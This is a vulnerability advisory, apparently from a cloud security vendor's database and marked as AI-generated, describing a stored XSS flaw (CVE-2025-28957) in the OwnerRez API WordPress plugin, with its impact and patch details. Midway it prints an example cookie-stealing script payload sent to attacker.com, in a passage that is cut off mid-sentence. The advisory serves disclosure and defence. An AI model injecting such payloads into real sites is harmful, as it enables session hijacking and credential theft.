
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2025-28957 is a Stored Cross-Site Scripting (XSS) vulnerability in the OwnerRez API WordPress plugin affecting versions up to and including 1.2.1. The flaw was reported by researcher Muhammad Yudha - DJ on May 31, 2025, and publicly disclosed by Patchstack on July 4, 2025. It carries a CVSS v3.1 base score of 6.5 (Medium), with a patched version (1.2.2) available (Patchstack).
The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation), specifically a Stored XSS variant. An attacker with at least Contributor-level privileges can inject malicious scripts into fields processed by the OwnerRez API plugin; these scripts are then persistently stored and executed in the browsers of other users who visit the affected pages. Exploitation requires low attack complexity over a network vector, but does require user interaction (a privileged user must view the injected content) and results in a changed scope, meaning the impact can extend beyond the vulnerable component (Patchstack).
Successful exploitation allows an attacker to inject and persistently store malicious JavaScript or HTML payloads within the WordPress site, which execute in the context of any user's browser upon visiting the affected page. This can lead to session hijacking, credential theft, unauthorized actions performed on behalf of victims (including administrators), redirection to malicious sites, and defacement. The changed scope means impact can extend to users and systems beyond the directly vulnerable plugin component (Patchstack).
No public proof-of-concept exploit code or evidence of active in-the-wild exploitation has been reported for CVE-2025-28957. The EPSS score is approximately 0.033% (0.000330), indicating a very low probability of exploitation in the near term. The vulnerability requires at least Contributor-level access to the WordPress site to inject payloads, which limits opportunistic exploitation. Patchstack classifies this as low priority with no impactful threat currently observed (Patchstack).
<script>document.location='https://attacker.com/steal?c='+document.cookie</script>) into the vulnerable field via the plugin's content submission interface.<script>, <img onerror=, or similar HTML/JS tags stored in WordPress database fields associated with the OwnerRez API plugin.The vendor has released version 1.2.2 of the OwnerRez API WordPress plugin, which addresses this vulnerability. Site administrators should update the plugin to version 1.2.2 or later immediately. If an immediate update is not possible, restricting Contributor-level and above account registrations or disabling the plugin temporarily can reduce exposure. Patchstack users can enable auto-update for vulnerable plugins as an additional safeguard (Patchstack).
Wordfence included CVE-2025-28957 in its weekly WordPress vulnerability report for the period of June 30 to July 6, 2025, noting it as part of a broader set of plugin vulnerabilities disclosed that week (Wordfence). Patchstack, which coordinated the disclosure, classified the issue as low priority with no impactful threat currently observed (Patchstack). No significant broader media coverage or notable researcher commentary beyond these standard disclosure channels has been identified.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."